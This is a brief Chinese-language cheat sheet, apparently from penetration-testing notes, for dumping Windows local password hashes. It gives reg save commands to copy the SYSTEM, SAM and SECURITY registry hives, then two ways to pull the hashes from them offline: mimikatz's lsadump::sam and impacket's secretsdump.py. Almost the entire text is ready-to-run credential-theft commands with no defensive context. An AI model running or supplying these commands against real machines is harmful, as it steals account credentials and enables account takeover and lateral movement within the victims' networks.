1、下载下面3个文件
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
2、获取密码hash
方法1:使用mimikatz(本地机器系统与位数最好与目标主机保持一致)
mimikatz.exe “lsadump::sam /system:sys.hiv /sam:sam.hiv” exit
方法2:python脚本
python /root/impacket/examples/secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL